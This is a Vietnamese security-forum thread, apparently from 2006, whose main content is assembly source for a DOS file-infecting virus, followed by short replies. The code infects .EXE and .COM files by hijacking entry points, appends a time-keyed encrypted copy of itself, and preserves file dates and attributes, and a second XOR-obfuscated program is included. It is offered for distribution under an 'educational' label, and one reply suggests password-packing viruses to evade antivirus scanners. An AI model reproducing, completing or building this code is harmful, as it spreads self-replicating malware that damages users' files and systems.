jmp short findfirstnext
exit_infect_mask: ret

infect_exe:
les ax, dword ptr [bp+buffer+14h] ; Save old entry point
mov word ptr [bp+jmpsave2], ax
mov word ptr [bp+jmpsave2+2], es

les ax, dword ptr [bp+buffer+0Eh] ; Save old stack
mov word ptr [bp+stacksave2], es
mov word ptr [bp+stacksave2+2], ax

mov ax, word ptr [bp+buffer + 8] ; Get header size
mov cl, 4 ; convert to bytes
shl ax, cl
xchg ax, bx

les ax, [bp+offset newDTA+26]; Get file size
mov dx, es ; to DX:AX
push ax
push dx

sub ax, bx ; Subtract header size from
sbb dx, 0 ; file size

mov cx, 10h ; Convert to segment:offset
div cx ; form

mov word ptr [bp+buffer+14h], dx ; New entry point
mov word ptr [bp+buffer+16h], ax

mov word ptr [bp+buffer+0Eh], ax ; and stack
mov word ptr [bp+buffer+10h], id

pop dx ; get file length
pop ax

add ax,(heap-decrypt) ; add virus size
adc dx, 0

mov cl, 9
push ax
shr ax, cl
ror dx, cl
stc
adc dx, ax
pop ax
and ah, 1 ; mod 512

mov word ptr [bp+buffer+4], dx ; new file size
mov word ptr [bp+buffer+2], ax

push cs ; restore ES
pop es

push word ptr [bp+buffer+14h] ; needed later
mov cx, 1ah
jmp short finishinfection
infect_com: ; ax = filesize
mov cx,3
sub ax,cx
lea si,[bp+offset buffer]
lea di,[bp+offset save3]
movsw
movsb
mov byte ptr [si-3],0e9h
mov word ptr [si-2],ax
add ax,103h
push ax ; needed later
finishinfection:
push cx ; Save # bytes to write
xor cx,cx ; Clear attributes
call attributes ; Set file attributes

mov al,2
call open

mov ah,40h ; Write to file
lea dx,[bp+buffer] ; Write from buffer
pop cx ; cx bytes
int 21h

mov ax,4202h ; Move file pointer
xor cx,cx ; to end of file
cwd ; xor dx,dx
int 21h

get_encrypt_value:
mov ah,2ch ; Get current time
int 21h ; dh=sec,dl=1/100 sec
or dx,dx ; Check if encryption value = 0
jz get_encrypt_value ; Get another if it is
mov [bp+decrypt_value],dx ; Set new encryption value
lea di,[bp+code_store]
mov ax,5355h ; push bp,push bx
stosw
lea si,[bp+decrypt] ; Copy encryption function
mov cx,startencrypt-decrypt ; Bytes to move
push si ; Save for later use
push cx
rep movsb

lea si,[bp+write] ; Copy writing function
mov cx,endwrite-write ; Bytes to move
rep movsb
pop cx
pop si
pop dx ; Entry point of virus
push di
push si
push cx
rep movsb ; Copy decryption function
mov ax,5b5dh ; pop bx,pop bp
stosw
mov al,0c3h ; retn
stosb

add dx,offset startencrypt - offset decrypt ; Calculate new
mov word ptr [bp+patch_startencrypt+1],dx ; starting offset of
call code_store ; decryption
pop cx
pop di
pop si
rep movsb ; Restore decryption function

mov ax,5701h ; Restore creation date/time
mov cx,word ptr [bp+newDTA+16h] ; time
mov dx,word ptr [bp+newDTA+18h] ; date
int 21h

mov ah,3eh ; Close file
int 21h

mov ch,0
mov cl,byte ptr [bp+newDTA+15h] ; Restore original
call attributes ; attributes

dec byte ptr [bp+numinfec] ; One mo infection
jnz mo_infections ; Not enough
pop ax ; remove call from stack
jmp done_infections
mo_infections: jmp find_next

open:
mov ah,3dh
lea dx,[bp+newDTA+30] ; filename in DTA
int 21h
xchg ax,bx
ret

attributes:
mov ax,4301h ; Set attributes to cx
lea dx,[bp+newDTA+30] ; filename in DTA
int 21h
ret

write:
pop bx ; Restore file handle
pop bp ; Restore relativeness
mov ah,40h ; Write to file
lea dx,[bp+decrypt] ; Concatenate virus
mov cx,(heap-decrypt) ; # bytes to write
int 21h
push bx
push bp
endwrite:

int24: ; New int 24h (error) handler
mov al,3 ; Fail call
iret ; Return control
data00 dw 2000,8,2500,8,2000,14,2500,14
dw 2500,14,3000,4,4000,24,3500,12,4000,6
dw 3500,12,4000,4,4500,10,5000,4
dw 5500,15,3000,8,3500,20,3000,8,3500,50
dw 2000,8,2500,8,2000,14,2500,14
dw 2500,14,3000,4,4000,24,3500,12,4000,6
dw 3500,12,4000,4,4500,10,5000,4
dw 5500,15,3000,8,3500,20,3000,8,3500,50
dw 2000,8,2500,8,2000,14,2500,14
dw 2500,14,3000,4,4000,24,3500,12,4000,6
dw 3500,12,4000,4,4500,10,5000,4
dw 5500,15,3000,8,3500,20,3000,8,3500,50
dw 0

data_6 db 9
db 10h, 19h, 45h, 18h, 19h, 1Bh
db 01h,0D5h,0CDh,0CDh,0B8h, 04h
db 0F3h, 09h,0A9h, 04h, 9Dh
db 9
db 0AAh, 04h,0F2h, 01h,0D5h,0CDh
db 0CDh,0B8h, 19h, 1Ch, 18h, 19h
db 12h,0D5h, 1Ah, 0Ah,0CDh,0BEh
db 20h, 09h, 5Ch, 04h,0F6h, 09h
db 2Fh, 20h, 01h,0D4h, 1Ah, 0Ah
db 0CDh,0B8h, 19h, 13h, 18h, 19h
db 03h,0C9h, 1Ah, 0Dh,0CDh,0BEh
db 19h, 03h, 0Fh,0D2h,0B7h, 19h
db 04h,0D6h, 1Ah, 03h,0C4h,0B7h
db 20h,0D2h,0D2h,0C4h,0C4h,0C4h
db 0B7h, 19h, 04h, 01h,0D4h, 1Ah
db 0Eh,0CDh,0BBh, 19h, 03h, 18h
db 19h, 03h,0BAh, 19h, 12h, 07h
db 0BAh,0BAh, 19h, 04h,0BAh, 19h
db 03h,0BDh, 20h,0BAh,0BAh, 19h
db 02h,0D3h,0B7h, 19h, 13h, 01h
db 0BAh, 19h, 03h, 18h, 19h, 03h
db 0BAh, 19h, 07h, 0Bh, 1Ah, 02h
db 04h, 19h, 07h, 08h,0BAh,0B6h
db 19h, 04h,0C7h,0C4h,0B6h, 19h
db 03h,0BAh,0B6h, 19h, 03h,0BAh
db 19h, 07h, 0Bh, 1Ah, 02h, 04h
db 19h, 08h, 01h,0BAh, 19h, 03h
db 18h,0D6h,0C4h,0C4h, 20h,0BAh
db 19h, 12h, 08h,0BAh,0D3h, 19h
db 02h,0B7h, 20h,0BAh, 19h, 03h
db 0B7h, 20h,0BAh,0D3h, 19h, 02h
db 0D6h,0BDh, 19h, 13h, 01h,0BAh
db 20h,0C4h,0C4h,0B7h, 18h,0D3h
db 0C4h,0C4h,0C4h,0BDh, 19h, 12h
db 08h,0D3h, 1Ah, 03h,0C4h,0BDh
db 20h,0D3h, 1Ah, 03h,0C4h,0BDh
db 20h,0D0h, 1Ah, 03h,0C4h,0BDh
db 19h, 14h, 01h,0D3h,0C4h,0C4h
db 0C4h,0BDh, 18h, 04h, 1Ah, 04h
db 3Eh, 19h, 03h, 0Fh,0D6h, 1Ah
db 04h,0C4h,0B7h, 20h,0D6h, 1Ah
db 03h,0C4h,0B7h, 20h,0D2h,0D2h
db 0C4h,0C4h,0C4h,0B7h, 20h,0D2h
db 0D2h,0C4h,0C4h,0C4h,0B7h, 20h
db 0D6h, 1Ah, 03h,0C4h,0B7h, 20h
db 0D2h,0B7h, 19h, 04h,0D2h, 20h
db 20h,0D2h,0D2h,0C4h,0C4h,0C4h
db 0B7h, 19h, 03h, 04h, 1Ah, 04h
db 3Ch, 18h, 01h,0D6h,0C4h,0C4h
db 0C4h,0B7h, 19h, 07h, 07h,0D6h
db 0C4h,0BDh
dd 319BA20h ; Data table (indexed access)
db 0BDh, 20h,0BAh,0BDh, 19h, 02h
db 0BAh, 20h,0BAh,0BDh, 19h, 02h
db 0BAh, 20h,0BAh, 19h, 03h,0BDh
db 20h,0BAh,0BAh, 19h, 04h,0BAh
db 20h, 20h,0BAh,0BAh, 19h, 02h
db 0BAh, 19h, 03h, 01h,0D6h,0C4h
db 0C4h,0C4h,0B7h, 18h,0D3h,0C4h
db 0C4h, 20h,0BAh, 19h, 06h, 08h
db 58h, 19h, 03h,0C7h,0C4h,0B6h
db 19h, 03h,0BAh, 1Ah, 03h,0C4h
db 0BDh, 20h,0BAh, 1Ah, 03h,0C4h
db 0BDh, 20h,0C7h,0C4h,0B6h, 19h
db 03h,0BAh,0B6h, 19h, 04h,0BAh
db 20h, 20h,0BAh,0B6h, 19h, 02h
db 0BAh, 19h, 03h, 01h,0BAh, 20h
db 0C4h,0C4h,0BDh, 18h, 19h, 03h
db 0BAh, 19h, 03h, 08h,0D6h,0C4h
db 0BDh, 19h, 04h,0BAh, 19h, 03h
db 0B7h, 20h,0BAh, 19h, 05h,0BAh
db 19h, 05h,0BAh, 19h, 03h,0B7h
db 20h,0BAh,0D3h, 19h, 02h,0B7h
db 20h,0BAh, 20h, 20h,0BAh,0D3h
db 19h, 02h,0BAh, 19h, 03h, 01h
db 0BAh, 19h, 03h, 18h, 19h, 03h
db 0BAh, 19h, 03h, 08h,0D3h, 1Ah
db 04h,0C4h,0BDh, 20h,0D3h, 1Ah
db 03h,0C4h,0BDh, 20h,0BDh, 19h
db 05h,0BDh, 19h, 05h,0D3h, 1Ah
db 03h,0C4h,0BDh, 20h,0D3h, 1Ah
db 03h,0C4h,0BDh, 20h,0D0h, 20h
db 20h,0D0h, 19h, 03h,0D0h, 19h
db 03h, 01h,0BAh, 19h, 03h, 18h
db 19h, 03h,0C8h, 1Ah, 15h,0CDh
db 0B8h, 19h, 0Ch,0D5h, 1Ah, 16h
db 0CDh,0BCh, 19h, 03h, 18h, 19h
db 1Ah,0D4h,0CDh, 04h, 1Ah, 03h
db 0F7h, 09h, 2Fh, 04h,0EAh, 09h
db 5Ch, 04h, 1Ah, 03h,0F7h, 01h
db 0CDh,0BEh, 19h, 1Bh, 18h

data_1e equ 0A0h
dot_dot db '..',0
heap:
; The following code is the buffer for the write function
code_store: db (startencrypt-decrypt)*2+(endwrite-write)+1 dup (?)
oldint24 dd ? ; Storage for old int 24h handler
backslash db ?
origdir db 64 dup (?) ; Current directory buffer
newDTA db 43 dup (?) ; Temporary DTA
numinfec db ? ; Infections this run
buffer db 1ah dup (?) ; read buffer
endheap: ; End of virus
finish label near
end entry_point

; Yeah, the main problem is reproducing the effect in an infected file so
; thta when IT runs, IT too will display... That's the GLITCH...
;
; Also, I had stuck INT 27H in somewhere around the EXIT .EXE...
; I don't remember, but it would go resident and suck up memory, yet
; since it hooked no interuppts, it just sat there...
; Feel free to STUDY this code and distribute it feely for educational
; purposes, because in spite of the kidding...I don't "hAcK"... for lack
; of a better word...--->>pAgE<<---

PAGE ,132
S00000 SEGMENT BYTE PUBLIC 'code'
ASSUME CS:S00000
ASSUME SS:S00000
ASSUME DS:S00000
H00000 DB 256 DUP(?)
P00100 PROC FAR
ASSUME ES:S00000
H00100:
JMP SHORT H00104
DB 90H
H00103 DB 2
H00104:
CALL P0010A
JMP H006F1
P0010A PROC NEAR
H0010A:
PUSH CX
MOV BX,0138H
H0010E:
MOV CH,[BX]
XOR CH,H00103
MOV [BX],CH
INC BX
CMP BX,0900H
JLE H0010E
POP CX
RET
P0010A ENDP
DW 00BAH
DW 8B01H
DW 0E51EH
DW 5306H
DW 0E0E8H
DW 5BFFH
DW 0C8B9H
DW 0B407H
DW 0CD40H
DW 5321H
DW 0D4E8H
DW 5BFFH
DW 0DC3H
DW 1B10H
DW 0800H
DW 1BB1H
DW 0C104H
DW 2218H
DW 0BDC6H
DW 011BH
DW 1BB1H
DW 0B115H
DW 011BH
DW 1B1AH
DW 0C100H
DW 0418H
DW 0DBC6H
DW 0B302H
DW 14B3H
DW 1918H
DW 10B3H
DW 22DFH
DW 0822H
DW 1BB1H
DW 0C101H
DW 0C18H
DW 0C0C6H
DW 0518H
DW 0C3C6H
DW 0BDC6H
DW 2222H
DW 1B1AH
DW 0B100H
DW 061BH
DW 0B302H
DW 14B3H
DW 1D18H
DW 10B3H
DW 22DFH
DW 0C208H
DW 0C6C6H
DW 0C6C0H
DW 1BDBH
DW 0B10CH
DW 0B1BH
DW 22B1H
DW 1A22H
DW 001BH
DW 1BB1H
DW 0201H
DW 0B3B3H
DW 1814H
DW 0B323H
DW 0DF10H
DW 001BH
DW 0B108H
DW 121BH
DW 1BB1H
DW 0C20BH
DW 0C6C6H
DW 1B1AH
DW 0B100H
DW 001BH
DW 0B302H
DW 14B3H
DW 2118H
DW 10B3H
DW 22DFH
DW 1B13H
DW 0B06H
DW 10DCH
DW 1322H
DW 0DC22H
DW 2210H
DW 2213H
DW 10DCH
DW 1322H
DW 0DC22H
DW 2210H
DW 1B13H
DW 0DC06H
DW 2210H
DW 2213H
DW 0DC22H
DW 2210H
DW 1322H
DW 2222H
DW 10DCH
DW 2222H
DW 1B1AH
DW 0800H
DW 22B1H
DW 0222H
DW 0B3B3H
DW 1814H
DW 0B30AH
DW 180DH
DW 0B31AH
DW 1002H
DW 14DFH
DW 0B3B3H
DW 10B3H
DW 13DFH
DW 0B22H
DW 02DCH
DW 1810H
DW 0B306H
DW 2213H
DW 0DC0BH
DW 0DC22H
DW 1002H
DW 0B3B3H
DW 2213H
DW 0DC0BH
DW 1002H
DW 13B3H
DW 0B22H
DW 02DCH
DW 1810H
DW 0B306H
DW 2213H
DW 0DC0BH
DW 0DC22H
DW 0DC22H
DW 0DC22H
DW 1002H
DW 22B3H
DW 1B1AH
DW 0800H
DW 22B1H
DW 0222H
DW 0B3B3H
DW 1814H
DW 0B305H
DW 180DH
DW 0B31BH
DW 1002H
DW 22DFH
DW 1422H
DW 10B3H
DW 13DFH
DW 061BH
DW 0DC0BH
DW 2210H
DW 2213H
DW 0DC22H
DW 1002H
DW 22B3H
DW 1322H
DW 0B22H
DW 02DCH
DW 0B310H
DW 1B13H
DW 0B06H
DW 10DCH
DW 1322H
DW 0DC22H
DW 1002H
DW 13B3H
DW 0B22H
DW 02DCH
DW 0B310H
DW 2213H
DW 0DC0BH
DW 1002H
DW 22B3H
DW 081AH
DW 0C6C6H
DW 0DBC0H
DW 2222H
DW 0B302H
DW 14B3H
DW 0518H
DW 0DB3H
DW 0E18H
DW 12B3H
DW 051BH
DW 1814H
DW 0B301H
DW 1002H
DW 1BDFH
DW 0800H
DW 22B1H
DW 0222H
DW 0B3B3H
DW 13B3H
DW 0B22H
DW 02DCH
DW 0B310H
DW 2213H
DW 0DC0BH
DW 0DC22H
DW 1002H
DW 22B3H
DW 2213H
DW 0DC0BH
DW 1002H
DW 22B3H
DW 0B3B3H
DW 13B3H
DW 0B22H
DW 02DCH
DW 0B310H
DW 2213H
DW 0DC0BH
DW 1002H
DW 22B3H
DW 0B3B3H
DW 2213H
DW 0DC0BH
DW 1002H
DW 22B3H
DW 221AH
DW 0822H
DW 1BB1H
DW 0200H
DW 0B3B3H
DW 1814H
DW 0B305H
DW 180DH
DW 0B30EH
DW 0DC12H
DW 0D9D9H
DW 1402H
DW 0B3B3H
DW 0B0B0H
DW 120DH
DW 14D9H
DW 0B3B3H
DW 02B3H
DW 0DF10H
DW 011BH
DW 0B108H
DW 1322H
DW 061BH
DW 0DC0BH
DW 1002H
DW 13B3H
DW 0B22H
DW 02DCH
DW 0B310H
DW 2213H
DW 0DC0BH
DW 1002H
DW 13B3H
DW 0B22H
DW 02DCH
DW 0B310H
DW 1B13H
DW 0B06H
DW 02DCH
DW 0B310H
DW 2213H
DW 0DC0BH
DW 1002H
DW 1BB3H
DW 1300H
DW 0B22H
DW 02DCH
DW 0B310H
DW 1A22H
DW 2222H
DW 0B108H
DW 001BH
DW 0B302H
DW 14B3H
DW 0518H
DW 0DB3H
DW 0E18H
DW 12B3H
DW 0D9DCH
DW 02D9H
DW 0B314H
DW 0B3B3H
DW 0DB0H
DW 0D912H
DW 0B314H
DW 02B3H
DW 0DF10H
DW 061BH
DW 0B108H
DW 2222H
DW 1802H
DW 0B307H
DW 0B322H
DW 22B3H
DW 0B3B3H
DW 0B322H
DW 22B3H
DW 0718H
DW 22B3H
DW 0B3B3H
DW 001BH
DW 0B3B3H
DW 22B3H
DW 221AH
DW 0822H
DW 1BB1H
DW 0200H
DW 0B3B3H
DW 1814H
DW 0B301H
DW 0B30DH
DW 0B3B3H
DW 0B302H
DW 180DH
DW 0B30EH
DW 0DC12H
DW 0718H
DW 14D9H
DW 0B3B3H
DW 1002H
DW 1BDFH
DW 0801H
DW 0C6D8H
DW 1BDBH
DW 0D818H
DW 0C6C6H
DW 0BDC6H
DW 2222H
DW 221AH
DW 0B122H
DW 011BH
DW 0B302H
DW 14B3H
DW 0B3B3H
DW 0DB3H
DW 1818H
DW 02B3H
DW 0DF10H
DW 001BH
DW 0C108H
DW 0418H
DW 0C0C6H
DW 1618H
DW 0DBC6H
DW 001BH
DW 22B1H
DW 1A22H
DW 2222H
DW 18C1H
DW 0C601H
DW 02BDH
DW 0B3B3H
DW 140DH
DW 1F18H
DW 02B3H
DW 0DF10H
DW 2222H
DW 0B108H
DW 071BH
DW 2216H
DW 140DH
DW 1656H
DB 'jg"ocl"ujm"`pmwejv"{mw"'
DW 2210H
DW 0822H
DW 22B1H
DW 1A22H
DW 2222H
DW 1BB1H
DW 0B101H
DW 0B302H
DW 0DB3H
DW 1814H
DW 0B31EH
DW 1002H
DW 1BDFH
DW 0800H
DW 1BB1H
DW 0201H
DW 0B3B3H
DW 2216H
DB 0DH
DB '400."Qikqo"Mlg."Acrvkcl"'
DW 2210H
DW 0822H
DW 22B1H
DW 1A22H
DW 2222H
DW 1BB1H
DW 0B101H
DW 0B302H
DW 0DB3H
DW 1814H
DW 0B310H
DW 1002H
DW 0DDFH
DW 1814H
DW 0B305H
DW 1002H
DW 1BDFH
DW 0801H
DW 1BB1H
DW 0201H
DW 0B3B3H
DW 2216H
DB 0DH
DB 'Vpkrq."clf"Qw`/Xgpm"lmu"'
DW 2210H
DW 0822H
DW 22B1H
DW 1A22H
DW 2222H
DW 1BB1H
DW 0B101H
DW 0B302H
DW 0DB3H
DW 1814H
DW 0B310H
DW 1002H
DW 1BDFH
DW 0801H
DW 1BB1H
DW 0B105H
DW 011BH
DW 0B302H
DW 16B3H
DW 0D22H
DB 'qjcliq"{mw"ceckl.""ukvj"'
DW 2210H
DW 0822H
DW 0C6C2H
DW 1AC6H
DW 2222H
DW 1BB1H
DW 0B101H
DW 0B302H
DW 0DB3H
DW 1814H
DW 0B310H
DW 1002H
DW 1BDFH
DW 0801H
DW 0C6C2H
DW 0BDC6H
DW 061BH
DW 0C6C1H
DW 22BDH
DW 0222H
DW 0B3B3H
DW 2216H
DB 0DH
DB 'jkq"ncvgqv,,,'
DW 081BH
DW 1B10H
DW 1A06H
DW 2222H
DW 0C208H
DW 0C6C6H
DW 0C6C0H
DW 02C3H
DW 0B3B3H
DW 140DH
DW 1118H
DW 02B3H
DW 0DF10H
DW 071BH
DW 0B108H
DW 061BH
DW 22B1H
DW 22B1H
DW 0222H
DW 1A18H
DW 1BB3H
DW 1A04H
DW 061BH
DW 0B108H
DW 2222H
DW 0B302H
DW 0DB3H
DW 1814H
DW 0B315H
DW 1002H
DW 22DFH
DW 0822H
DW 1BB1H
DW 0B106H
DW 0C222H
DW 1E18H
DW 0BDC6H
DW 011BH
DW 0C61AH
DW 0C0C6H
DW 0C6C6H
DW 22DBH
DW 0222H
DW 0B3B3H
DW 140DH
DW 1418H
DW 02B3H
DW 0DF10H
DW 001BH
DW 0C108H
DW 0C6C6H
DW 0C0C6H
DW 0DBC6H
DW 071BH
DW 2217H
DB 0CH
DB 'Qikqo"3;;0"/"Tkpwq'
DW 0118H
DW 2223H
DW 2210H
DW 0C108H
DW 0118H
DW 1AC6H
DW 2222H
DW 1BB1H
DW 0206H
DW 0B3B3H
DW 140DH
DW 0A18H
DW 02B3H
DW 0DF10H
DW 0A1BH
DW 0D808H
DW 0418H
DW 0DBC6H
DW 001BH
DW 1BB1H
DW 0207H
DW 0B3B3H
DW 1B17H
DW 0D01H
DB 'Egv"c"ncvg"rcqq#'
DW 011BH
DW 2210H
DW 0B108H
DW 011BH
DW 0D81AH
DW 0DBC6H
DW 001BH
DW 0B302H
DW 0DB3H
DW 1811H
DW 0D909H
DW 0D914H
DW 12D9H
DW 10DFH
DW 071BH
DW 0B108H
DW 081BH
DW 1BB1H
DW 0207H
DW 1A18H
DW 22B3H
DW 0822H
DW 1BB1H
DW 1A01H
DW 22B1H
DW 0B302H
DW 0DB3H
DW 1811H
DW 0D919H
DW 1002H
DW 1BDFH
DW 0805H
DW 1BB1H
DW 0D811H
DW 0918H
DW 0DBC6H
DW 011BH
DW 021AH
DW 0B3B3H
DW 120DH
DW 2218H
DW 0DFD9H
DW 1B10H
DW 0806H
DW 1BB1H
DW 0B111H
DW 121BH
DW 0D1AH
DW 1812H
DW 0D921H
DW 10DFH
DW 011BH
DW 0C208H
DW 1118H
DW 0DBC6H
DW 121BH
DW 281AH
DB 2
DB '(,GZG'
DW 5E02H
DW 0102H
DB '========"""'
DW 0111H
DW 0202H
DW 2802H
DW 0EFD3H
DW 1348H
DW 7B68H
DW 14D4H
DW 0202H
DW 0202H
DB 'FMQ'
DB 2
DB '""""'
DW 0202H
DW 0202H
DW 0102H
DB '========GZG'
DW 0705H
DW 2302H
DW 2802H
DW 0EFD3H
DB 'H"*'
DW 2300H
DW 0002H
DW 0202H
DB 2
DB 'VCPEGP,GZG'
DW 0202H
DW 9502H
DW 4432H
DW 7304H
DW 9504H
DW 0232H
DB 'VGOR'
DW 0202H
DW 0202H
DW 0202H
DW 0202H
DW 0202H
DW 0202H
DW 0202H
DW 0202H
DW 0202H
DW 0202H
DW 0202H
DW 0202H
DW 0202H
DW 0202H
DW 0202H
DW 0202H
DW 0202H
DW 0202H
DW 0202H
DW 0202H
DW 0202H
DW 0202H
DW 0202H
DW 0202H
DW 0202H
DW 0202H
DW 0202H
DW 0202H
DW 0202H
DW 0202H
DW 0207H
DW 002AH
DW 0223H
DW 0222H
DW 22CFH
DW 0202H
H006F1:
MOV DX,3202H
IRET
P00100 ENDP
DW 3E23H
DW 7001H
DW 0B629H
DW 0CF2EH
DW 8A23H
DW 0114H
DW 0B603H
DW 0CF28H
DW 8223H
DW 1BF8H
DW 067EH
DW 073EH
DW 0176H
DW 77E9H
DW 0BC92H
DW 033AH
DW 02BAH
DW 8CBAH
DW 0BDC2H
DW 0202H
DW 06BBH
DW 0EA07H
DW 0207H
DW 0FCE9H
DW 88EBH
DW 0E102H
DW 8959H
DW 31D5H
DW 0FEC2H
DB 0AEH
DB '>"p'
DW 0A907H
DW 0FAE0H
DW 4EE9H
DW 123EH
DW 0571H
DW 0E682H
DW 08F2H
DW 0E9E2H
DW 3EF3H
DW 761AH
DW 7111H
DW 2E1BH
DW 0012H
DW 00C2H
DW 00C2H
DW 00C2H
DW 82C2H
DW 8DE6H
DW 0E208H
DW 0D8E9H
DW 0C083H
DW 02A2H
DW 0F889H
DW 0D0E9H
DW 193EH
DW 0570H
DW 0CE77H
DW 0F682H
DW 0E982H
DW 3EC5H
DW 891BH
DW 0AEDBH
DW 0CA88H
DW 22B2H
DW 0076H
DW 49AEH
DW 0EF30H
DW 0F143H
DW 89A9H
DW 4BC9H
DW 0A8E2H
DW 0B8C1H
DW 0444H
DW 18B6H
DW 23CFH
DW 1BB6H
DW 23CFH
DW 0D288H
DW 0C0FCH
DW 45B6H
DW 0A7BCH
DW 0CF04H
DW 0B823H
DW 0446H
DW 39B6H
DW 23CFH
DW 11BBH
DW 0B802H
DW 043EH
DW 4CB6H
DW 23CFH
DW 103FH
DW 7702H
DW 0E901H
DW 9253H
DW 4DB6H
DW 23CFH
DW 103FH
DW 7602H
DW 0B845H
DW 0466H
DW 39B6H
DW 23CFH
DW 2DB6H
DW 23CFH
DW 048EH
DW 049EH
DW 1C8BH
DW 049CH
DW 73B8H
DW 0B604H
DW 0CF18H
DW 0BB23H
DW 0205H
DW 3CB8H
DW 0B604H
DW 0CF4CH
DW 3F23H
DW 0210H
DW 2377H
DW 4DB6H
DW 23CFH
DW 103FH
DW 7702H
DW 0B81AH
DW 0446H
DW 39B6H
DW 23CFH
DW 18B6H
DW 1C8CH
DW 049EH
DW 1489H
DW 049CH
DW 23CFH
DW 0B2E9H
DW 7BE9H
DW 0B692H
DW 0CF2DH
DW 8E23H
DW 0A004H
DW 8B04H
DW 0A21CH
DW 0B804H
DW 048DH
DW 73B9H
DW 8904H
DW 1A45H
DW 0EBA1H
DW 8904H
DW 1445H
DW 0E5A1H
DW 8904H
DW 1745H
DW 02BAH
DW 0CF41H
DW 8B23H
DW 0E90CH
DW 0BA04H
DW 4103H
DW 0CB31H
DW 23CFH
DW 02BAH
DW 0CF3FH
DB '#p!'
DW 0E7A1H
DW 0B604H
DW 893DH
DW 0E71CH
DW 0BB04H
DW 0200H
DW 0EFB8H
DW 0CF04H
DW 0B623H
DW 893CH
DW 0E71CH
DW 0CF04H
DW 8923H
DW 0EF1CH
DW 8304H
DW 0E9F9H
DW 7700H
DW 0B60DH
DW 8C18H
DW 0A01CH
DW 8904H
DW 0A214H
DW 0CF04H
DW 0EB23H
DW 0FD77H
DW 8DB8H
DW 0BA04H
DW 3F00H
DW 23CFH
DW 0E7A1H
DW 0EA04H
DW 0FA9DH
DW 03BAH
DW 8955H
DW 0E71CH
DW 8904H
DW 0E50CH
DW 8904H
DW 0EB14H
DW 0CF04H
DW 0BA23H
DW 4103H
DW 0C89H
DW 04E9H
DW 8DB8H
DW 0CF04H
DW 0B623H
DW 0B839H
DW 0446H
DW 23CFH
DW 39B6H
DW 0A7B8H
DW 0CF04H
DW 0BA23H
DW 4E02H
DB 0CFH
DB '#OaCdgg"upmvg"Ujcng######'
S00000 ENDS
END P00100

[Question] down virus	02/07/2006 09:04:15 (+0700) \| #5 \| 3058

format
Member

Joined: 29/06/2006 22:08:58
Messages: 29
Offline

Xài sao vậy bạn
Tui nghe nói có chương trình nuôi vius có đúng không vậy bạn

[Question] down virus	03/07/2006 01:00:20 (+0700) \| #6 \| 3194

trojon
Member

Joined: 29/06/2006 22:36:06
Messages: 47
Offline

Đây là mã nguồn viết bằng ngôn ngữ ASM
Nếu bạn muốn dịch thì bạn dùng trình biên dịch ASM.
chúc thành công

[Question] down virus	04/07/2006 00:42:44 (+0700) \| #7 \| 3499

taianhlacontrai
Member

Joined: 30/06/2006 19:21:06
Messages: 53
Location: Tây nguyên
Offline

nhưng trước hết phải học asm đi đã trước khi nghĩ đến chuyện đó
"Tui nghe nói có chương trình nuôi vius có đúng không vậy bạn "
---> nuôi gì đâu nếu có thì nén lại đặt pass cho các chương trính anti khỏi diệt thôi

to :trojon theo ý mình nếu là mã nguồn các ngôn ngữ lập trình thì lên code hay quocte tránh các kí tự trùng với emoticons

[Question] Re: down virus	04/12/2006 09:07:35 (+0700) \| #8 \| 27786

xnohat
Moderator

Joined: 30/01/2005 13:59:19
Messages: 1210
Location: /dev/null
Offline

Mới nghe là có vụ nuôi virus đó smilie

.Chú em nên đi học cho ra hồn đi đã, chưa gì lo đi sưu tầm virus để chơi, tính mang khoe à ?

iJust clear, "What I need to do and how to do it"/i
br
brBox tán gẫu dời về: http://www.facebook.com/hvaonline

Go to:

Users currently in here
1 Anonymous